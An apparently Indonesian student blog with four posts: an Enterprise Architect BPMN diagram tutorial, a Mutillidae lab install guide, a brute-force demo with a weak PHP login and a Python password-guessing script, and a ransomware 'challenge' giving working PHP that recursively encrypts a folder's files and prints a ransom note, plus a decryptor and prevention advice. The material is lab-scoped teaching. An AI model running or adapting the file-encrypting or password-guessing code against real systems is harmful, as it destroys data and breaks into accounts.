BUAT DIAGRAM DI EA BESTIEeeehhhh

Read

BUAT DIAGRAM DI EA SAYYYY💅

BAB I

Masukan Username dan Password - Business Of Unit - Business Process Unit 2024 - Pilih ADP - Pilih Business Process Diagram yang ingin di buat (di klik 2x semua) :

1. Membuat Kertas Kerja / BPMN Diagram :

Klik Kanan di Elemen Activity ( sesuai ID Probis yang akan di buat).
Pilih new child diagram - Composite structure diagram.
Activity yang di pilih akan berubah ada tanda (+).

2. Lalu klik 2x, kertas kerjanya masih kosong, lalu klik kanan pilih find in browser atau (Shift+Alt+G).

3. Lalu cek di seblah kiri PROJECT BROWSER (sesuai judul level 4 yang di pilih).

Ada icon warna biru (kertas kerja BPMN) :

4. Lalu buat PACKAGE (biasanya disebut folder) :

Cari dulu level 3nya, - klik sekali sampai berwarna ABU-ABU - klik New Package :

Klik New Package - Rename dan samakan dengan judul Level 4 nya.
Initial Contentnya ganti menjadi Package Only. - Klik OK

Maka akan terbuat PACKAGE baru yang posisinya akan disini dan seperti ini (dibawah level 3) :

5. Lalu pindahkan kertas kerja yang sudah dibuat ke packcage yang baru saja di buat

(ke level 4nya) :

Drag and Drop saja, maka tampilannya akan seperti dibawah :

6. Cara membuka menu TOOLBOX :

Klik tanda panah ke kanan seperti yang aku lingkari yaaa sayy

Lalu tampilannya akan menjadi seperti ini sayyy

Sekarang kita akan membuat "DIMENSI" ;

Ada 7 yaitu : PROGRAM, STANDART dan REGULASI , APLIKASI, DATA, PROBIS, RISIKO, KPI.

BAB II

PEMBUATAN DIAGRAM :

PEMBUATAN POOL

Cara membuat Diagramnya, kita harus buat 7 "POOL" nya yaitu PROGRAM, STANDART dan REGULASI , APLIKASI, DATA, PROBIS, RISIKO, KPI. :

Drag and Drop saja POOLnya di kertas kerja kita, tampilannya akan seperti di bawah. (biasanya auto langsung suruh kasih nama (beri nama salah 1 dari 7 dimensi yang akan kita buat (diusahakan untuk penamaan urut seperti flowchart sebelumnya))

Ulangi step 7 sebanyak 7x (Kecuali dalam bagian PROBIS).

Atau bisa juga klik 2x di poolnya, tampilannya akan seperti di bawah, kasih nama lalu OK

PADA BAGIAN POOL ELEMEN PROBIS - Beri judul dan id probis sesuai dengan PACKAGE atau KERTAS KERJANYA. (Jangan sampai salah).

2. PENGISIAN DIMENSI PROGRAM

Masuk ke project Browser, tutup saja kotak Business Archutecturenya bestieee.
Lalu buka Architecture Vision

Lalu buka VISI, MISI, STRATEGI - Strategi Map pln ip 2024-2029
lalu kita akan memasukan ke kertas kerjanya dengan cara MEREFERENSIKAN dengan cara Pilih SO Sesuai dengan Flowchart di file sebelumnya :

DRAG SO yang sesuai dengan flowchart yang ada, lalu DROP ke kertas kerja di dalam dimensi program maka akan muncul tampilan seperti ini :

Tampilan Dimensi Programnya akan seperti ini

3. PENGISIAN DIMENSI STANDAR & REGULASI

Pada menu START cari tulisan SEARCH 🔍 klik - PILIH MODEL

Nanti akan muncul tampilan FIND IN PROJECT - kita Konfigurasi/setting dulu untuk pencariannya.
Klik tombol edit di sebelah kanan 📝 (warna biru).

Lalu masuk ke PROJECT BROWSER - Business Architecture - Regulation and Standard.
Kalo pengen cepet langsung di search ajahh, caranya ada di bawah ini

Carane : Ketik nomor SK sesuai flowchart sebelumnya, ( Regulasi dan Standart harus sudah warna abu- abu seperti diatas) contoh kalo pake search :

Jika SK tidak ketemu saat search in-nya menggunakan Current Package, bisa di coba ganti dengan menggunakan search in Model.

Jika sudah menemukan SK yang dimaksud bisa KLIK KANAN lalu pilih COPY SELECTED to CLIPBOARD.

Lalu masuk lagi ke diagram sebelumnya, pilih dimensi STANDART & REGULASI - klik SELECT - Paste as Reference - pilih drop as link lalu klik OK (jangan lupa di save).

4. PENGISIAN DIMENSI APLIKASI

Masuk ke Application Architecture - Application Use Case Diagram.
Kembali ke menu SEARCH (Find in Project), lalu ketikan judul aplikasi yang ada di flowchart.

Klik kanan pada Aplikasi yang dicari lalu klik COPY SELECTED to CLIPBOARD

Masuk ke kertas kerja level 4 kita, lalu Pilih dimensi APLIKASI - klik SELECT di layout - Paste as Reference - pilih drop as link lalu klik OK (jangan lupa di save). (caranya sama jika aplikasi yang di butuhkan dalam diagram lebih dari 1)

5. PENGISIAN DIMENSI RISIKO

Masuk ke Business Architecture - Risk Diagram (klik sampai berwarna abu -abu).

Kembali ke menu SEARCH (Find in Project), lalu ketikan apa yang ada di flowchart.
Klik kanan pada Aplikasi yang dicari lalu klik COPY SELECTED to CLIPBOARD.

Masuk ke kertas kerja level 4 kita, lalu Pilih dimensi RISIKO- klik SELECT di layout - Paste as Reference - pilih drop as link lalu klik OK (jangan lupa di save). (caranya sama jika risiko yang di butuhkan dalam diagram lebih dari 1)

6. PENGISIAN DIMENSI KPI (harus yang requirment)

Masuk ke Business Architecture - KPI Diagram - KPI UNIT (klik sampai berwarna abu -abu).

Kembali ke menu SEARCH (Find in Project), lalu ketikan judul KPI yang ada di flowchart.
Klik kanan pada KPI yang dicari lalu klik COPY SELECTED to CLIPBOARD.

Masuk ke kertas kerja level 4 kita, lalu Pilih dimensi KPI- klik SELECT di layout - Paste as Reference - pilih drop as link lalu klik OK (jangan lupa di save). (caranya sama jika KPI yang di butuhkan dalam diagram lebih dari 1)

7. PENGISIAN DIMENSI DATA

Masuk ke Data Architecture - klik sampai berwarna abu-abu

Kembali ke menu SEARCH (Find in Project), lalu ketikan apa yang ada di flowchart.
Klik kanan pada Aplikasi yang dicari lalu klik COPY SELECTED to CLIPBOARD.

8. PENGISIAN DIMENSI PROBIS

Buat LINE terlebih dahulu untuk aktornya.- KLIK KANAN - find - in project browser.
Karna sudah ada ORGANISASI AKTOR (jadi tidak perlu bikin lagi)

Klik kanan pada bagian ORGANIZATIONAL AKTOR - new element - lalu

DRAG and DROP saja LANE dari package yang sudah kita buat..

Buka TOOLBOX, lalu DRAG menu START EVENT

Lalu untuk membuat activity caranya sama, tinggal drag and drop saja

Lalu ada yang namanya Gateway

Untuk menarik garisnya gunakan

Lalu buat semuanya sesuai dengan template flowchart probis kalian.

TETAP PUTUS ASA DAN JANGAN SEMANGAT

Read More Add comment

Vulnerable Web With Mutillidae (instalasi)

By bella sevenia

Read

0 Comments

1. Pengantar OWASP Mutillidae

OWASP Mutillidae adalah aplikasi web yang sengaja dibuat rentan untuk tujuan pendidikan dan pelatihan keamanan aplikasi web. Dikembangkan sebagai bagian dari Open Web Application Security Project (OWASP), Mutillidae dirancang untuk membantu pengembang, penguji keamanan, dan peneliti keamanan untuk mempelajari dan menguji berbagai jenis kerentanan keamanan aplikasi web.

2. Tujuan dan Manfaat

Pendidikan Keamanan: Memberikan platform bagi individu untuk belajar dan memahami berbagai jenis kerentanan keamanan.
Pengujian Penetrasi: Memungkinkan penguji penetrasi untuk melatih keterampilan mereka dalam lingkungan yang aman dan terkendali.
Pengembangan Keamanan: Membantu pengembang memahami kelemahan dalam aplikasi web dan bagaimana cara mengatasinya.

3. Fitur Utama

Berbagai Jenis Kerentanan: Menyediakan contoh kerentanan umum seperti SQL Injection, Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Insecure Direct Object References, dan lain-lain.
Mode Pelatihan dan Tantangan: Menawarkan mode pelatihan untuk belajar serta tantangan untuk menguji pengetahuan dan keterampilan.
Documentasi dan Tutorial: Dilengkapi dengan dokumentasi dan tutorial untuk membantu pengguna memahami dan mengeksploitasi kerentanan.

4. Instalasi dan Konfigurasi

Pastikasn sudah memiliki virtual box dan kali linux
buka browser di kali linux dan download xampp untuk linux
lakukan instalasi, dengan membuka terminal pada file manger > download
ketikkan 'ls -l' untuk mencari data yg ada
masukkan 'sudo chmod +x xampp-linux-x64-8.2.12-0-installer.run', masukan sandi kali
masukkan kembali sudo ./xampp-linux-x64-8.2.12-0-installer.run
instal hingga selesai
nyalakan untuk mysql
buka phpmyadmin tambahkan untuk file mutillidae
buka pada file system > lampp > htdocs > mutillidae > src > includes, open terminal here
buka terminal ketikkan "ls -l" untuk menampilkan file
buka sudo nano database-config.inc
hapus untuk passnya pastikan kososng.
masuk ke localhost/mutillidae, scroll hingga ke bawah hingga bertemu opt out
mutillidae siap di gunakan.

5. Kerentanan yang Dipelajari

Berikut beberapa kerentanan umum yang dapat dipelajari menggunakan Mutillidae:

SQL Injection
- Teknik di mana penyerang dapat menyuntikkan pernyataan SQL jahat ke dalam query database.
- Contoh: Menggunakan input form untuk memasukkan perintah SQL.
Cross-Site Scripting (XSS)
- Kerentanan yang memungkinkan penyerang untuk menyuntikkan skrip jahat ke dalam halaman web yang dilihat oleh pengguna lain.
- Contoh: Menyisipkan kode JavaScript ke dalam input pengguna yang tidak ter-filter.
Cross-Site Request Forgery (CSRF)
- Kerentanan yang memungkinkan penyerang untuk melakukan tindakan yang tidak diinginkan atas nama pengguna yang terautentikasi.
- Contoh: Mengirimkan permintaan berbahaya yang tampak sah dari browser korban.
Insecure Direct Object References (IDOR)
- Kerentanan di mana penyerang dapat mengakses objek yang tidak seharusnya dapat mereka akses dengan memanipulasi parameter dalam URL atau form.
- Contoh: Mengubah ID dalam URL untuk mengakses data milik pengguna lain.

6. Praktik Keamanan Terbaik

Validasi dan Sanitasi Input
- Selalu validasi dan sanitasi input dari pengguna untuk mencegah injeksi.
Penggunaan Parameterized Queries
- Gunakan prepared statements atau parameterized queries untuk menghindari SQL Injection.
Penggunaan Token CSRF
- Implementasikan token CSRF untuk mencegah serangan CSRF.
Akses Kontrol yang Ketat
- Terapkan kontrol akses yang ketat dan pastikan hanya pengguna yang berwenang yang dapat mengakses data tertentu.

Read More Add comment

SERANGAN BRUTE FORCE

By bella sevenia

Read

0 Comments

Apasih Brute Force itu ?

Brute Force adalah sebuah metode serangan di dunia keamanan siber di mana penyerang mencoba untuk menebak kata sandi, kunci enkripsi, atau informasi lainnya dengan mencoba semua kemungkinan kombinasi hingga menemukan yang benar. Istilah ini mengacu pada pendekatan yang kasar dan langsung, dengan mengandalkan kekuatan komputasi untuk mencoba berbagai kombinasi.

Cara Kerja Brute Force :

1. Penyerang Mengumpulkan Informasi: Sebelum memulai serangan, penyerang sering kali mengumpulkan informasi sebanyak mungkin tentang target.

2. Menebak Secara Berurutan: Penyerang menggunakan program khusus untuk mencoba semua kombinasi kata sandi atau kunci enkripsi. Program ini bisa dimulai dari kombinasi yang paling sederhana hingga yang paling kompleks.

3. Penggunaan Script dan Bot: Untuk mempercepat proses, penyerang sering menggunakan script atau bot yang otomatis mencoba ribuan atau bahkan jutaan kombinasi dalam waktu singkat.

Dampak Brute Force :

- Keamanan yang Terancam: Jika serangan berhasil, penyerang dapat mendapatkan akses tidak sah ke akun, data, atau sistem yang dilindungi.

- Kerugian Finansial: Data yang dicuri dapat digunakan untuk penipuan finansial atau dijual di pasar gelap.

- Kerusakan Reputasi: Perusahaan yang diserang dapat kehilangan kepercayaan dari pelanggan dan mitra bisnisnya.

- Downtime Sistem: Serangan brute force dapat menghabiskan sumber daya sistem, menyebabkan penurunan kinerja atau bahkan downtime.

Cara Mencegah Brute Force :

1. Penggunaan Kata Sandi yang Kuat: Menggunakan kata sandi yang panjang, kompleks, dan unik untuk setiap akun dapat membuat serangan brute force menjadi lebih sulit.

2. Membatasi Percobaan Login: Menetapkan batas percobaan login yang gagal sebelum mengunci akun sementara atau secara permanen.

3. Menggunakan CAPTCHA: Mengimplementasikan CAPTCHA untuk memastikan bahwa percobaan login dilakukan oleh manusia, bukan bot.

4. Autentikasi Dua Faktor (2FA): Menambahkan lapisan keamanan tambahan di mana pengguna harus memverifikasi identitas mereka melalui metode lain selain kata sandi.

5. Pemantauan dan Deteksi: Menggunakan sistem pemantauan untuk mendeteksi pola login yang mencurigakan dan merespons secara cepat terhadap potensi serangan.

Dengan langkah-langkah pencegahan yang tepat, resiko serangan brute force dapat diminimalisir, meskipun tidak dapat dihilangkan sepenuhnya.

Demo:

Buat folder brute_force di disk:C
Buat file index.php dan isikan kode berikut:
<?php
session_start();
$users = [
'admin' => 'password123',
'user' => 'userpass'
];
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$username = $_POST['username'];
$password = $_POST['password'];
if (isset($users[$username]) && $users[$username] == $password) {
$_SESSION['username'] = $username;
echo "Login berhasil!";
} else {
echo "Login gagal!";
}
}
?>

<!DOCTYPE html>
<html>
<head>
<title>Login</title>
</head>
<body>
<form method="post" action="">
Username: <input type="text" name="username"><br>
Password: <input type="password" name="password"><br>
<input type="submit" value="Login">
</form>
</body>
</html>

Simulasi serangan brute force dengan python
Buat file brute_force.py dan isikan kode berikut(untuk httpx, dapat melakukan installasi dengan mengetikan pip install httpx):
import hashlib
import httpx

url = "http://localhost/brute_force/index.php"
username = "admin"
passwords = ["password", "123456", "password123", "admin", "userpass"]

for password in passwords:
# hashed_password = hashlib.md5(password.encode()).hexdigest()
data = {
"username": username,
"password": password
}
response = httpx.post(url, data=data)
if "Login berhasil" in response.text:
print(f"Password ditemukan: {password}")
break
else:
print(f"Percobaan gagal: {password}")

Buka browser dan login dengan user admin/password123 pada url http://localhost/brute_force/index.php

Jalankan serangan brute force pada terminal/cmd (pastikan terinstall python) dengan mengetikkan python brute_force.py

Tambahkan script untuk mencegah serangan brute force
Untuk mencegah serangan brute force pada file PHP Anda, Anda dapat menambahkan beberapa mekanisme untuk membatasi jumlah percobaan login yang dapat dilakukan dalam jangka waktu tertentu. Salah satu cara untuk melakukannya adalah dengan menyimpan informasi tentang percobaan login di sesi atau basis data, dan memblokir atau menunda permintaan setelah sejumlah percobaan yang gagal.
Berikut adalah contoh implementasi sederhana menggunakan sesi PHP untuk membatasi jumlah percobaan login:
<?php
session_start();

// Inisialisasi pengguna dan kata sandi
$users = [
'admin' => 'password123',
'user' => 'userpass'
];

// Maksimal percobaan login
$max_attempts = 5;
// Waktu penguncian dalam detik (misalnya 15 menit)
$lockout_time = 15 * 60;

if (!isset($_SESSION['attempts'])) {
$_SESSION['attempts'] = 0;
}

if (!isset($_SESSION['lockout_time'])) {
$_SESSION['lockout_time'] = 0;
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$current_time = time();

if ($_SESSION['attempts'] >= $max_attempts && $current_time < $_SESSION['lockout_time']) {
echo "Terlalu banyak percobaan login. Coba lagi nanti.";
} else {
$username = $_POST['username'];
$password = $_POST['password'];

if (isset($users[$username]) && $users[$username] == $password) {
$_SESSION['username'] = $username;
$_SESSION['attempts'] = 0;
$_SESSION['lockout_time'] = 0;
echo "Login berhasil!";
} else {
$_SESSION['attempts'] += 1;

if ($_SESSION['attempts'] >= $max_attempts) {
$_SESSION['lockout_time'] = $current_time + $lockout_time;
echo "Terlalu banyak percobaan login. Coba lagi nanti.";
} else {
echo "Login gagal!";
}
}
}
}
?>

<!DOCTYPE html>
<html>
<head>
<title>Login</title>
</head>
<body>
<form method="post" action="">
Username: <input type="text" name="username"><br>
Password: <input type="password" name="password"><br>
<input type="submit" value="Login">
</form>
</body>
</html>

Meski begitu tetap masih perlu keamanan tambahan, seperti menambahkan
Gunakan Captcha: Menambahkan Captcha pada formulir login dapat membantu memverifikasi bahwa pengguna adalah manusia dan bukan skrip otomatis.
Menggunakan Rate Limiting: Implementasikan rate limiting untuk membatasi jumlah permintaan yang dapat dilakukan oleh alamat IP tertentu dalam jangka waktu tertentu.
Tingkatkan Keamanan dengan IP Blocking: Blokir alamat IP yang mencurigakan atau yang melakukan terlalu banyak percobaan login gagal.

TERIMA KASIH !!

Read More Add comment

MARI KITA MENCOBA CHALLENGE RANSOMWARE !

By bella sevenia

Read

0 Comments

1. Apa itu Ransomeware?

Sebelum kita mencoba challenge Ransomware kita harus tau apa sih runsomware itu ?

Ransomware adalah jenis perangkat lunak berbahaya (malware) yang dirancang untuk mengenkripsi data atau mengunci akses ke sistem korban. Penyerang kemudian meminta tebusan (ransom) kepada korban agar mereka dapat mendapatkan kunci dekripsi atau akses kembali ke data mereka. Ini adalah serangan yang serius dan dapat menyebabkan kerugian besar bagi individu maupun organisasi yang terkena dampaknya.

Saya akan memberikan beberapa demo ransomware untuk teman - teman :

Contohnya seperti ini : xampp - htdocs - ransomware - target folder.

Lalu teman - teman aktifkan xampp dan buka folder tersebut di VS Code, lalu buat file diluar target folder dengan nama encrypt,php. Lalu masukan codingan ini :

<?php
 // Generate key
 $key = base64_encode(openssl_random_pseudo_bytes(32));
 // Simpan kunci ke file (untuk dekripsi nantinya)
 file_put_contents('key.txt', $key);
 // Fungsi untuk mengenkripsi file
 function encryptFile($file, $key) {
 $data = file_get_contents($file);
 $method = 'aes-256-cbc';
 $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($method));
 $encrypted = openssl_encrypt($data, $method, $key, 0, $iv);
 $encrypted .= '::' . base64_encode($iv);
 file_put_contents($file, $encrypted);
 }
 // Tentukan folder yang akan dienkripsi
 $folder = './target_folder';
 $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
 foreach ($files as $file) {
 if ($file->isFile()) {
 encryptFile($file->getRealPath(), $key);
 }
 }
 echo "Semua file telah dienkripsi. Bayar tebusan untuk mendapatkan kunci dekripsi.";
 ?>

Masukan juga contoh file atau gambar pada folder bernama target_folder contohnya seperti ini :

Jika semua sudah di masukan sesuai perintah, lalu run file codingan yang ada, dan buka di chrome atau google, maka tampilannya akan menjadi seperti ini : filenya terkunci dan tidak bisa di buka.

Dan pada folder tampilannya akan menjadi seperti ini :

Namun untuk lebih lanjutnya :

2. Sejarah Ransomware

Ransomware pertama kali muncul pada akhir tahun 1980-an. Berikut adalah beberapa tonggak sejarah penting dalam perkembangan ransomware:

1989: AIDS Trojan (PC Cyborg): Ransomware pertama yang diketahui, juga dikenal sebagai AIDS Trojan atau PC Cyborg, disebarkan melalui disket. Malware ini akan menyembunyikan file direktori dan mengenkripsi nama file pada drive C:, kemudian menuntut pembayaran sebesar $189 kepada PC Cyborg Corporation.
2005-2006: Ransomware modern: Jenis ransomware modern mulai muncul, menggunakan enkripsi yang lebih canggih dan metode distribusi yang lebih luas, seperti melalui email atau situs web yang terinfeksi.
2013: CryptoLocker: Salah satu ransomware paling terkenal yang menyebar melalui lampiran email berbahaya. CryptoLocker menggunakan enkripsi RSA dan menuntut pembayaran dalam Bitcoin.
2017: WannaCry: Ransomware ini menyebar secara global dan mempengaruhi ratusan ribu komputer dalam hitungan hari. WannaCry memanfaatkan kerentanan dalam sistem operasi Windows yang dikenal sebagai EternalBlue, yang dieksploitasi oleh kelompok hacker Shadow Brokers.
2020-an: Evolusi dan peningkatan serangan: Ransomware terus berkembang dengan teknik baru, termasuk model Ransomware-as-a-Service (RaaS), di mana penjahat siber menjual atau menyewakan ransomware mereka kepada pihak ketiga.

3. Dampak Ransomware

Dampak dari serangan ransomware dapat sangat merugikan, baik dari segi finansial maupun operasional. Berikut adalah beberapa dampak utama dari serangan ransomware:

Kerugian Finansial: Pembayaran tebusan seringkali sangat mahal, dan biaya pemulihan data yang terinfeksi juga dapat mencapai jutaan dolar.
Gangguan Operasional: Sistem yang terinfeksi mungkin tidak dapat digunakan hingga data dipulihkan, menyebabkan gangguan besar pada operasi bisnis atau layanan publik.
Kehilangan Data: Jika data tidak dapat dipulihkan, perusahaan atau individu mungkin kehilangan data penting secara permanen.
Kerusakan Reputasi: Serangan ransomware dapat merusak reputasi perusahaan atau organisasi, menurunkan kepercayaan pelanggan atau publik.
Implikasi Hukum: Ada kemungkinan adanya konsekuensi hukum jika data pribadi atau sensitif terungkap dalam serangan ransomware.

4. Pencegahan Ransomware

Mencegah serangan ransomware membutuhkan pendekatan berlapis yang melibatkan teknologi, pelatihan, dan kebijakan keamanan. Berikut adalah beberapa langkah pencegahan yang dapat diambil:

Backup Data Secara Rutin: Pastikan untuk melakukan backup data secara teratur dan menyimpan salinan backup di lokasi yang terpisah dari jaringan utama.
Update dan Patch Sistem: Selalu perbarui perangkat lunak dan sistem operasi dengan patch terbaru untuk mengurangi kerentanan yang dapat dieksploitasi.
Gunakan Antivirus dan Antimalware: Instal dan perbarui perangkat lunak antivirus dan antimalware untuk mendeteksi dan memblokir malware sebelum infeksi terjadi.
Pelatihan Keamanan: Edukasi karyawan atau pengguna tentang bahaya phishing dan praktik keamanan siber yang baik, termasuk cara mengenali email atau situs web yang mencurigakan.
Segmentasi Jaringan: Batasi akses antar bagian jaringan untuk mencegah penyebaran ransomware jika terjadi infeksi.
Aktifkan Firewall dan IPS/IDS: Gunakan firewall dan sistem deteksi/pencegahan intrusi untuk memonitor dan memblokir aktivitas mencurigakan.
Aktifkan Enkripsi Data: Enkripsi data penting untuk mengurangi dampak jika data dicuri atau dienkripsi oleh ransomware.

Demo:

Buat folder ransomware, di dalam folder tersebut buat lagi folder target_folder
Isikan target_folder beberapa file contoh yang akan di encrypt oleh ransomware
Buat file encrypt.php dan isikan kode berikut:

<?php
// Generate key
$key = base64_encode(openssl_random_pseudo_bytes(32));

// Simpan kunci ke file (untuk dekripsi nantinya)
file_put_contents('key.txt', $key);

// Fungsi untuk mengenkripsi file
function encryptFile($file, $key) {
    $data = file_get_contents($file);
    $method = 'aes-256-cbc';
    $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($method));
    $encrypted = openssl_encrypt($data, $method, $key, 0, $iv);
    $encrypted .= '::' . base64_encode($iv);
    file_put_contents($file, $encrypted);
}

// Tentukan folder yang akan dienkripsi
$folder = './target_folder';

$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
foreach ($files as $file) {
    if ($file->isFile()) {
        encryptFile($file->getRealPath(), $key);
    }
}
echo "Semua file telah dienkripsi. Bayar tebusan untuk mendapatkan kunci dekripsi.";
?>

Jalankan serangan ransomware di browser dengan mengetikkan http://localhost/ransomware/encrypt.php
Cek folder target_folder dan buka isi filenya
Folder yang semula bisa terbuka, menjadi terkunci ketika mendapatkan ransomware

Bentuk mitigasi yang bisa dilakukan

Buat file decrypt.php dengan kode berikut untuk mendekripsi file yang terenkripsi:

<?php
// Load the key from the file
$key = file_get_contents('key.txt');

// Fungsi untuk mendekripsi file
function decryptFile($file, $key) {
    $data = file_get_contents($file);
    list($encrypted_data, $iv) = explode('::', $data, 2);
    $method = 'aes-256-cbc';
    $decrypted = openssl_decrypt($encrypted_data, $method, $key, 0, base64_decode($iv));
    file_put_contents($file, $decrypted);
}

// Tentukan folder yang akan didekripsi
$folder = './target_folder';

$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
foreach ($files as $file) {
    if ($file->isFile()) {
        decryptFile($file->getRealPath(), $key);
    }
}
echo "Semua file telah didekripsi.";
?>

Jalankan file tersebut dengan mengetikkan: http://localhost/ransomware/decrypt.php

Dan lihat kembali di folder target_folder

File yang semula terkunci, kini sudah bisa terbuka kembali.

Pencegahan Pasca Serangan Ransomware

Setelah mengalami serangan ransomware, ada beberapa langkah penting yang dapat diambil untuk meminimalkan kerusakan lebih lanjut dan mencegah serangan serupa di masa depan. Berikut adalah panduan pencegahan pasca serangan ransomware:

1. Isolasi dan Kontrol Kerusakan

Isolasi Sistem yang Terinfeksi: Segera isolasi komputer atau sistem yang terinfeksi dari jaringan utama untuk mencegah penyebaran ransomware ke perangkat lain.
Matikan Jaringan: Jika perlu, matikan jaringan secara keseluruhan untuk menghentikan penyebaran ransomware hingga situasi terkendali.

2. Identifikasi dan Hapus Ransomware

Identifikasi Jenis Ransomware: Gunakan alat dan layanan yang tersedia untuk mengidentifikasi jenis ransomware yang menyerang sistem Anda. Ini akan membantu menentukan langkah-langkah pemulihan yang tepat.
Hapus Ransomware: Gunakan perangkat lunak antivirus dan antimalware untuk membersihkan sistem dari ransomware. Pastikan semua salinan ransomware telah dihapus sebelum mencoba memulihkan data.

3. Pemulihan Data

Gunakan Backup: Jika Anda memiliki cadangan data, gunakan backup tersebut untuk memulihkan data yang terinfeksi. Pastikan backup tersebut tidak terinfeksi sebelum digunakan.
Alat Dekripsi: Cari alat dekripsi yang mungkin tersedia untuk jenis ransomware tertentu. Beberapa organisasi keamanan siber menyediakan alat dekripsi gratis untuk ransomware yang sudah dikenal.

4. Laporkan Insiden

Lapor ke Pihak Berwenang: Laporkan insiden ransomware kepada pihak berwenang, seperti lembaga penegak hukum atau badan keamanan siber nasional. Ini dapat membantu dalam investigasi dan penanggulangan kejahatan siber.
Lapor ke Regulator: Jika serangan ransomware melibatkan data pribadi atau sensitif, laporkan insiden tersebut kepada regulator yang relevan, seperti komisi perlindungan data.

5. Evaluasi dan Pembelajaran

Analisis Forensik: Lakukan analisis forensik untuk memahami bagaimana serangan terjadi, jalur infeksi, dan kerentanan yang dieksploitasi.
Evaluasi Proses Keamanan: Tinjau kembali kebijakan dan prosedur keamanan siber yang ada. Identifikasi kelemahan dan buat perbaikan yang diperlukan untuk mencegah serangan serupa di masa depan.

6. Tingkatkan Keamanan

Pembaruan dan Patch: Pastikan semua perangkat lunak, sistem operasi, dan aplikasi diperbarui dengan patch keamanan terbaru.
Pelatihan Karyawan: Tingkatkan program pelatihan keamanan siber untuk karyawan, termasuk cara mengenali dan merespons ancaman phishing dan malware.
Implementasi Keamanan Berlapis: Terapkan pendekatan keamanan berlapis yang mencakup firewall, sistem deteksi dan pencegahan intrusi (IDS/IPS), serta solusi keamanan endpoint.
Segregasi Jaringan: Segmentasi jaringan untuk membatasi akses antar bagian jaringan dan mencegah penyebaran malware.

7. Kebijakan dan Prosedur Baru

Rencana Respons Insiden: Kembangkan atau perbarui rencana respons insiden untuk memastikan tindakan cepat dan efektif jika terjadi serangan ransomware di masa depan.
Kebijakan Backup: Pastikan kebijakan backup yang kuat dengan jadwal backup rutin dan verifikasi integritas data backup.
Kebijakan Akses: Tinjau kembali kebijakan akses untuk memastikan hanya individu yang memiliki hak akses yang diperlukan untuk data dan sistem tertentu.

Read More Add comment

Langganan: Komentar ( Atom )

Blog Bella Ciao

Latest Posts

BUAT DIAGRAM DI EA BESTIEeeehhhh

BUAT DIAGRAM DI EA SAYYYY💅

BAB I

1. Membuat Kertas Kerja / BPMN Diagram :

BAB II

PEMBUATAN DIAGRAM :

PEMBUATAN POOL

2. PENGISIAN DIMENSI PROGRAM

3. PENGISIAN DIMENSI STANDAR & REGULASI

4. PENGISIAN DIMENSI APLIKASI

5. PENGISIAN DIMENSI RISIKO

6. PENGISIAN DIMENSI KPI (harus yang requirment)

7. PENGISIAN DIMENSI DATA

8. PENGISIAN DIMENSI PROBIS

Vulnerable Web With Mutillidae (instalasi)

1. Pengantar OWASP Mutillidae

2. Tujuan dan Manfaat

3. Fitur Utama

5. Kerentanan yang Dipelajari

6. Praktik Keamanan Terbaik

SERANGAN BRUTE FORCE

Demo:

MARI KITA MENCOBA CHALLENGE RANSOMWARE !

2. Sejarah Ransomware

3. Dampak Ransomware

4. Pencegahan Ransomware

Pencegahan Pasca Serangan Ransomware

1. Isolasi dan Kontrol Kerusakan

2. Identifikasi dan Hapus Ransomware

3. Pemulihan Data

4. Laporkan Insiden

5. Evaluasi dan Pembelajaran

6. Tingkatkan Keamanan

7. Kebijakan dan Prosedur Baru

Recent Posts

Facebook

Laporkan Penyalahgunaan

Mengenai Saya

BUAT DIAGRAM DI EA BESTIEeeehhhh

Cari Blog Ini

Arsip Blog

Post Top Ad

Author Details

Popular Posts

Pages

About Me

Socialize

Facebook

Popular Posts